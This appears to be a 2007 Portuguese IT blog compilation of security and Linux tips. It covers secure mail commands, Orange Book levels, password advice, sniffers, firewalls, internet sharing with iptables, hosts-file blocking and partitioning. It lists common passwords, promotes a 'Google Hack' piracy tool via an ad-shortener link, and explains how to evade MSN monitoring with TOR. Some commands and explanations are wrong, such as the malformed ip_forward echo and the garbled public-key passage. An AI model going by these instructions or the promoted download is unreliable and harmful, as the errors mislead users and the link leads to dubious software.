O enroll é usado para acrescentar um usuário ao sistema de correio eletrônico seguro. Depois que digitar o comando, você deverá fornecer uma "chave". a chave é um carácter usado para determinar sua criptografia/decodificação - por exemplo, a letra "a".Você pode usar xsend no lugar de mail ou mailx para enviar uma mensagem, se quiser que ela seja segura. Isso coloca o utilitário no modo de entrada, e todas as outras operações são idênticas à maneira que trabalham com outras rotinas de correio eletrônico. Contudo, correspondência segura pode ser enviada apenas para um usuário, e mais de um nome na linha de comandos não pode ser especificado.Quando você iniciar uma sessão, a mensagem you have mail aparecerá. Ao tentar ver sua correspondência eletrônica, será informado sobre o usuário que te enviou (além de data e hora). Para ler a mensagem, você deverá usar o comando xget.O comando xget pedirá a chave e você deverá entrar com a mesma chave que foi usada durante o enroll. Se a chave fornecida estiver certa, a mensagem será apresentada e as mesmas opções estarão disponíveis para a leitura de qualquer mensagem. Se você fornecer a chave errada, ela ainda será apresentada, mas estará com caracteres de controle e não será possível realizar a leitura.

A criptografia é um processo complexo, e uma chave pública é atribuída ao sistema do arquivo montado seguramente. Uma chave pública é uma peça de conhecimento comum como - uma hora - que é criptografada. O cliente criptografa a chave pública e a envia para o servidor com todos os requisitos. O servidor decodifica e compara com o valor com ele acredita que deveria ser. Se eles coincidirem, as transações continuarão. Se eles não coincidirem, o cliente não terá acesso aos sistemas do arquivo do host.

.::[Segurança]Níveis de Segurança em Sistemas Operacionais::.

Trusted Computing Standards Evalution Criteria (também conhecido como Orange Book ou Livro Laranja), estabelecido pelo Departamento de Defesa dos Estados Unidos, concluiu que ninguém pode dizer se um computador é seguro ou não. Em vez disso, ele diz que níveis diferentes de segurança podem ser atribuídos a um sistema operacional. Todos os níveis são baseados na confiança que você tem no sistema operacional. Um sistema altamente confiável impede que intrusos entrem nele, ao passo que um sistema operacional menos confiável há maiores possibilidades de um intruso entrar sem ser notado. Quatro níveis de segurança são representados por letras que vão de A a D. Em cada nível de segurança, um número pode ser usado para subdividir o nível mais adiante como A1, A2, e assim por diante. O DOS é o representante de um sistema operacional de nível D1. Ela não tem segurança alguma; quem estiver ao teclado terá total acesso ao sistema. O conceito de propriedades de arquivo e permissão virtual não existe no DOS - todos os arquivos pertencem ao usuário atual. Do outro lado espectro, o nível A1 é virtualmente a máquina trancada no cofre forte sem eletricidade ou usuários. Todo o resto encontrasse em algum ponto dela.

Os sistemas operacionais de nível C possuem mais segurança do que os de nível D e têm um modo no qual um usuário é identificado antes de receber a permissão para acessar ou manipular arquivos. O UNIX padrão, sem outras características além de logins, senhas, e conceitos de propriedades de arquivo representa o nível C1. O C2 está um etapa mais alta que o C1 e inclui a capacidade de evitar que usuários executem comandos se eles não tiverem determinados critérios, tanto quanto a capacidade de auditoriar todas as ações que acontecerem. Vários sistemas UNIX hoje em dia, notavelmente o SCO UNIX, permitem esses recursos adicionais e são certificados como C2.

Os sistemas operacionais de nível B devem oferecer outras restrições de segurança - incluindo uma incapacidade do proprietário de um arquivo para alterar as permissões dele. Poucos sistemas operacionais, e certamente nenhum dos que estão disponíveis no comércio, atendem a todos os requisitos do nível B.

.::[Segurança]Protegendo suas Senhas::.

O tema a ser discutido agora é sobre como proteger suas senhas. Mas antes de pensar numa senha ideal, primeiro é necessários pensar como um "hacker" faria para roubar suas senhas, e como você poderia dificultar a vida do indivíduo...

1. Por dedução: Se o seu nome é Roberto Carlos e o login é Roberto, a senha pode ser Carlos... Há uma estatística que diz: Um em trinta usuários usam uma senha assim! A mesma coisa serve para seu nome invertido, nome do cachorro, esposa, filhos, placa do carro e etc.

2. Outra forma é rodar um programa que testa as senhas mais utilizadas em todo mundo. Abaixo vai uma lista com as palavras preferidas dessas listas:

love, sex, god, secret, default, unknown, aaa, abc, academia, academic, access, ada, admin, aerobics, airplane, albany, alf, algebra, alias, aliases, alpha, alphabet, amber, amorphous, analog, anchor, andromache, animals, anita, answer, anthropogenic, anything, april, aria, arrow, athena, atmosphere, aztecs, banana, bandit, banks, bart, bartman, basic, batman, beauty, wizard, work, whatever, visitor, unix, sysadmin, super, student, somebody, password, soap, smile, singer, signature, rolex, professor, pencil, paper, papers, operator, office, nobody, master, manager, guitar, golf, games, ferrari, coke, cigar.

3. Invadindo o sistema e roubando uma cópia dos arquivos onde estão suas senhas (arquivos PWL, DAT ou um arquivo de texto onde você escreve suas senhas para o caso de se esquecer delas...)

4. O "hacker" pode ser alguém que está ao seu lado (irmão, amigo, colega de serviço), toda hora que você for digitar sua senha ele fica de olho nas teclas. Isso se chama engenharia social.

Como se proteger:

A melhor forma de se proteger é criar uma senha difícil de ser descoberta seja lá qual for o método usado pelo "hacker".Uma forma de criar uma boa senha é imaginar uma frase com mais ou menos seis palavras sendo pelo menos uma um numeral, por exemplo, "Hoje fui ao mercado duas vezes." Pegue as iniciais de cada palavra e no numeral coloque o número correspondente. No exemplo usado a senha ficaria assim: hfam2v. Para complicar ainda mais a vida do "hacker", você pode intercalar letras maiúsculas com minúsculas: HfAm2V. Fácil de decorar e difícil de ser descoberta.

OBS: Vc tambem pode ajudar a dificultar a vida dos hackers iliminado senhas salvas no pc,como eliminado o cookies que são onde são amazenadas sua senha de login,do orkut por exemplo ou msn.Tambem ajuda muito não usar a opção salvar senha, ou lembrar senha e email,mesmo sendo seu PC,Pode ocorrer que seu pc possa por exemplo estar com um spyware,mas seu antivirus não o detecta e ele faz a festa recolhendo todos seus cookies salvos,imagine assim que ele recolhe a informção tando conectado na net, ele manda isso pra o hacker,via net.Lembre-se pode não ser solução mas dificulta muito.

.::[Segurança]Segurança Virtual::.

Segurança nas Compras.

É seguro comprar na pela Internet?

__Com a criptografia, a transação on-line torna-se bem mais segura!A Internet é a praia preferida dos malfeitores digitais: por mais seguro que seja, ou aparente, sempre vai haver alguém tentando fraudá-la.

Mas as técnicas de criptografia garantem que a compra por cartão de crédito pela web seja cada vez mais segura do que pelos meios normais - desde que tomemos alguns cuidados.

O primeiro deles é manter seus programas de computador sempre bem atualizados. Pois muitos programas possuem vulnerabilidades e brechas de segurança por onde o "hacker" faria o ataque; por isso a cada nova versão, os fabricantes de softwares corrigem o mais rápido possível as falhas para tornar seus programas mais seguros e confiáveis.

O segundo passo é escolher um site que ofereça sistemas de criptografia. Isso garante que os seus dados como o cartão de crédito transitarão embaralhados pela rede - praticamente impedindo a ação dos "hackers".

Alguns sites oferecem a opção de compra pelo sistema normal ou com criptografia. Escolha sempre com criptografia. Mesmo que a loja anuncie um sistema seguro, veja se ele realmente está funcionando. Os browsers têm um ícone na parte inferior da tela indicando as condições de segurança. Quando os dados trafegam criptografados, há um pequeno cadeado fechado sendo indicado no canto da tela. Quando não há segurança, o ícone não aparece ou o cadeado está aberto.

.::[Segurança] Contra Sniffers::.

Um sniffer é um programa que torna um computador promíscuo na rede, tendo assim, um acesso completo a todos os pacotes de comunicação que passam pela rede onde o computador está conectado! A não ser que toda a comunicação da rede seja feita com segurança.

Há dois método principais para proteger a rede de Sniffers.

Usando criptografia: a criptografia não vai impedir que os hackers tenham acesso à todos os pacotes da rede, mas vai impedir que tenha acesso as informações dos pacotes. Infelizmente, nos últimos meses foi provado que nenhum dos métodos de criptografia hoje usados são 100% seguros... Usando a tecnologia de one-time password: S/key e outras tecnologias de one-time password, tornaram sem efeito a ação do sniffer, já que a cada conexão uma nova senha deve ser informada. O uso dessa tecnologia permite usar um canal inseguro, pois não existe uma reutilização de uma mesma senha... Essa tecnologia é baseada em desafio e resposta. ( - - )

Obs.: Há sniffers que são usados por administradores de sistema,para monitoração de todo trafico da rede.

.::Os Firewalls::.

Os firewalls são elementos que combinam hardware e software construídos usando roteadores, servidores e uma variedade de softwares. Eles são instalados no ponto mais vulnerável entre uma rede corporativa.
__Quando complexos de apartamentos são construídos, as paredes de tijolos são erguidas entre as residências. Se houver um incêndio, as paredes não deixaram que o fogo se espalhe e entre em contato com as residências - por isso essas paredes são chamadas de firewalls.
__Ao se conectar o seu host com o mundo exterior, você pode obter que não conseguiria antes. Infelizmente, também cria formas para que o mundo externo entre no seu sistema e acesse coisas que talvez não devesse. Um firewall é um roteador através o qual do qual seus requisitos são emitidos e transmitidos e os recebidos são filtrados. Em outras palavras, você permite que intrusos entrem em seu roteador mas não em seu sistema - colocando um barreira de proteção entre você e o mundo exterior.
__Um roteador firewall é bem comum em várias instalações conectadas à Internet. Um roteador já existente pode ser convertido para executar essas funções se puder aceitar as configurações de filtragens mais complexas. Se não puder você poderá criar um a partir de um esboço rápido ou voltar para soluções de terceiros. Um exemplo é o produto FireWall-1 da CheckPoint Software Technologies Ltda.
__Em setembro de 1.994, a SunSoft Inc., uma divisão da Sun Microsystems Inc. anunciou a adesão do produto FireWall-1 à sua Família de Produtos Internet. Combinando o FireWall-1 com o software Internet Gateway da SunSoft, você pode transformar facilmente um servidor Solaris em um servidor Internet muito seguro que forneceria acesso total à Internet para seus usuários enquanto evitaria o acesso desautorizado para e a partir de sua rede.( - - )

Internet Firewalls

Resumo:

Internet Firewalls são mecanismos utilizados para proteger redes conectadas à Internet.Existem componentes básicos com os quais se pode construir uma infinidade de arquiteturas de firewall. Neste tutorial são apresentadas as arquiteturas mais usuais, suas características e comportamento.

Estratégias de Segurança

Basicamente, existem algumas estratégias de segurança. Estas estratégias não são exclusivas de ambientes de sistemas de computação, são estratégias de segurança de uma forma geral mas são muito úteis quando consideradas em toda a sua extensão. As estratégias aqui abordadas são:

* Least privilege;

* Choke point;

* Defense in depth;

* Weakest link;

* Fail safe;

* Universal participation;

* Diversity of Defense;

* Simplicidade.


Type Enforcement

.::Redirecionando a saida de um comando ou arquivo para um arquivo::.

Detalhes:

Podemos redirecionar um comando ou texto para um arquivo de forma simples.

Ex:

$ echo "ola testanto" > teste.txt

Cria o arquivo teste.txt com o conteúdo ''olá testando''.

A opção > apaga o conteúdo do arquivo caso ele exista e gera um novo conteúdo.Para que você não perca o conteúdo de um arquivo caso vá redirecionar um comando ou arquivo a um arquivo onde já exista conteúdo utilize a opção >>

Ex:

$ echo "ola testando2" >> teste.txt

Isso é muito util para editarmos arquivo de forma rápida sem nem precisar abrir nosso editor.

.::Compartilhamento de internet no Linux::.

Bom pessoal, nessa dica irei descrever um modo fácil e rápido de como compartilhar a Internet, que está num servidor Linux, para uma estação Windows, descrevendo os passos a serem seguidos tanto no Linux quanto no Windows. Vamos lá!!

No servidor Linux temos:

* eth0 = Essa placa conecta o servidor Linux com a estação Windows;
* eth1 = Essa placa conecta o servidor Linux a internet;

Na estação Windows temos:

* eth0 = Se conecta ao servidor Linux;


( 1) Configurando o servidor Linux:

Primeiro vamos setar o IP da placa de rede que se conecta à estação Windows (eth0), para isso usamos o comando abaixo:

# ifconfig eth0 192.168.0.1

Feito isso o IP da placa de rede eth0 passará a ser 192.168.0.1.

Depois disso vamos liberar o acesso com o iptables:

# iptables -A POSTROUTING -t nat -s 192.168.0.2 -o eth1 -j MASQUERADE

Esse comando vai direcionar tudo que chega na eth1 (a internet) para o IP 192.168.0.2 (que no nosso caso é da máquina Windows).

# iptables -t filter -P FORWARD ACCEPT

Esse comando aqui é bastante importante, pois é ele que autoriza o comando acima. Sem ele nada irá funcionar.

# echo > 1 /proc/sys/net/ipv4/ip_forward

Com esse comando você estará ativando o roteamento na sua máquina.

(2) Configurando a estação Windows:

Você precisa configurar manualmente as configurações TCP/IP de sua placa de rede, segue um exemplo:

IP = 192.168.0.2
Subnet Mask = 255.255.255.0
Default Gateway = 192.168.0.1 (esse Gateway se refere a minha máquina Linux)
Dns Primário = xxx.xxx.xxx.xxx (DNS DO SEU PROVEDOR)
Dns Secundário = xxx.xxx.xxx.xxx (DNS DO SEU PROVEDOR)


Pronto, com isso ficou resolvido meu compartilhamento!

.::Bloqueando sites específicos::.

Bloquear sites é uma tarefa extremamente simples.

Se você utiliza o Mozilla Firefox, a extensão AdBlock permite que você bloqueie diversos sites.

Se você utiliza qualquer outro navegador, e não quer instalar uma extensão, ou simplesmente quer um jeito mais simples de bloquear sites, você deve usar o arquivo HOSTS.

Vá até a pasta c:\Windows\System32\drivers\etc. Abra (com o Notepad, por exemplo) o arquivo hosts.

Basta adicionar uma entrada e relacioná-la com o IP 0.0.0.0.

Lembrando que muitos antivirus tem este recurso, alguns como o Norton pode estar com o nome parental control ou controle parental,nele vc pode indicar os sites que deseja bloquear.

OBS.: Só versão comercial de antivirus contém estas caractéristicas,normalmete são osde pacotes suites dos mesmos. As versãoes gratuitas normalmente são reduzidas devido ao custo.

sexta-feira, 14 de setembro de 2007

.::Tutorial sobre HD::.

1° parte

Bem pessoal vou colocar um tutorial sobre Disco rigido pra vcs espere q goste se vc ter paciencia pra ler ate o final rsrs.

Disco Rigido e hardware bem importante no nosso computador sem ele naum podemos ter nem sistema instalado,apesar de ter uma versão do linux q pode ser rodada do cd mais vamos esquecer isso.

Disco rigido e como um grande armario q vc pode ir guardando varias coisas quanto maiores for mais podemos enxer de besteira, de msma forma podemos divilo o armario em pratileira o hd acontece o msm podemos dividilo em partições q podera ser em varias parte quantas quizer mais na verdade vc estará dividindo em somente duas parte...

Ex: temos um HD de 40 GB iremos particionalo em 4 partes de 10 GB.

IMAGEM: http://img213.imageshack.us/img213/6489/hd3uz.gif

A parte vermelha e a unidade ESTENDIDA
A parte azul e a unidade LOGICA

Por isso ele e divido em duas parte unidade estendida e logicavc naum pode criar uma unidade logica sem criar unidade estendida e vc naum pode apagar uma unidade estendida se vc ainda tiver uma unidade logica.


2° parte

O q eh criar partição:

Criar partição e preparar o hd para ser utilizado.

Ex: vc construir uma lan-house e quer colocar os PCs nela, simplesmente vc naum pode sair colocando os PCs lá, vc tem q preparala para receber os micros.

Primeiro vc deve bota as mesas onde o pc ficara o PC;
Botar um AR-Condicionado para os micros ficarem em um ambiente fresco, e ai por diante.

Partições é isso, preparar o HD para receber os arquivos.

Como criar partições:

Existe varias maneiras de criar partições, irei colocar uma delas. Vc terá q ter um disquete de boot do 98 q pode ser feito no proprio Win. Primeiro vc deve defenir a sequencia de bot para disquete e HD.

Bote o disquete do win98 e ligue o PC
Ai aparecerá windows 98 blablabla...
Terá três opções, escolha sem suporte a CD Rom para ser um pouco mais rapido quando aparcer.
C:\>
Digite FDISK
Ficara assim:
C:\>fdisk
Ai siga as instruções.

Mais naum esqueça primeiro vc deve criar unidades estendidas para depois criar as logicas, vc tbm pode criar uma estendida com espaço todo do HD.

quinta-feira, 13 de setembro de 2007

.::[Download]GooGle Hack::.

MP3, Livros, Videos, Seriais, Ferramentas, Hacks, Proxys, Letras de Músicas e Fontes a um clique. Isso mesmo! Por causa da poderosa ferramenta de busca e indexação do google, o programa hacker consegue detectar sensíveis resultados da sua busca e achar para você aquele programa, música, vídeo, enfim o que você procura a um clique.


Estilo: Hacker Tool
Produtor: Blue Shirt Studio
Idioma: Inglês
Tamanho: 500Kb
Formato: Rar


Download do Arquivo:

http://iis365jg5wwpzbxumz.usercash.com/

quarta-feira, 12 de setembro de 2007

.::Melhorando a conexão da internet no Linux::.

Tutorial como fazer sua net ficar mais rápida.

Bom galera isso funcionou bem comigo, creio que poderá deixar a velocidade da sua conexão à internet melhor.

Se desejar, faça backup do arquivo de configuração antes de alterar as suas propriedades.

Enfim vamos lá. Gnome Terminal/Konsole e escreveremos:

$ gksudo gedit /etc/modprobe.d/aliases

Para KDE:

$ kdesu kate /etc/modprobe.d/aliases


Esse é o meu. Veja e insira do 17 para cima da mesma forma:

# These are the standard aliases for devices and kernel drivers.
# This file does not need to be modified.
#
# Please file a bug against module-init-tools if a package needs a entry
# in this file.

# network protocols ################################################## ########

alias net-pf-1 unixalias net-pf-2 ipv4
alias net-pf-3 ax25
alias net-pf-4 ipx
alias net-pf-5 appletalk
alias net-pf-6 netrom
alias net-pf-7 bridge
alias net-pf-8 atm
alias net-pf-9 x25
# 1, 2, 3 new lines
alias net-pf-10 ipv6 off
alias net-pf-10 off
alias ipv6 off
#alias net-pf-10 ipv6
alias net-pf-11 rose
alias net-pf-12 decnet#
13 NETBEUI
alias net-pf-15 af_key
alias net-pf-16 af_netlink
alias net-pf-17 af_packet
alias net-pf-15 af_key
alias net-pf-16 af_netlink
alias net-pf-17 af_packet

Segredo está aqui:

alias net-pf-10 ipv6 off: Desligado;
alias net-pf-10 off: Colocamos essa linha;
alias ipv6 off: Desligado;
#alias net-pf-10 ipv6: Colocamos a # (comentamos).

Depois e sá reiniciar a máquina e veremos a velocidade agora.

.::Burlando "MSN Sniffers" com TOR e Gaim::.

Introdução
O intenso crescimento do comunicador instantâneo Messenger da Microsoft acabou atraindo muitas empresas que desenvolvem softwares para gerenciamento e monitoração de internet a estarem desenvolvendo aplicações para o gerenciamento e monitoração do protocolo MSN.

Uma das minhas visões não técnicas sobre o assunto seria que este tipo de monitoração quando não notificada ao usuário da empresa pode ser classificada totalmente como invasão de privacidade do mesmo e este artigo não tem como intuito provocar ou incentivar o uso deste processo para realizar o acesso indevido e sim mostrar que todo investimento nestas ferramentas de monitoração as vezes podem ser inúteis quando não aplicadas da forma correta. Todas informações contidas neste artigo quando executadas são de sua total responsabilidade.

O TOR é uma ferramenta mantida pela EFF que visa manter o anonimato de toda internet, o TOR é multiplataforma, assim podendo ser utilizado em sistemas Windows e até em sistemas Unix. A rede TOR é mantida por diversos usuários da internet ao redor de todo mundo utilizando algoritmos próprios para o tunelamento. Deve-se tomar muito cuidado ao utilizar o TOR, pois o último nó do tunelamento de acesso não é criptografado.

O Gaim, no caso Pidgin, seria somente uma referência ao cliente do IM Messenger, pois atualmente qualquer cliente do IM Messenger suporta acessos via Proxy socks 5, então neste artigo o mais referente seria a idéia de integrar seu cliente IM Messenger com o TOR para evitar a captura das suas conversas.
 
Copyright 2007 - 2010 .::Mundo Digital::. - All Rights Reserved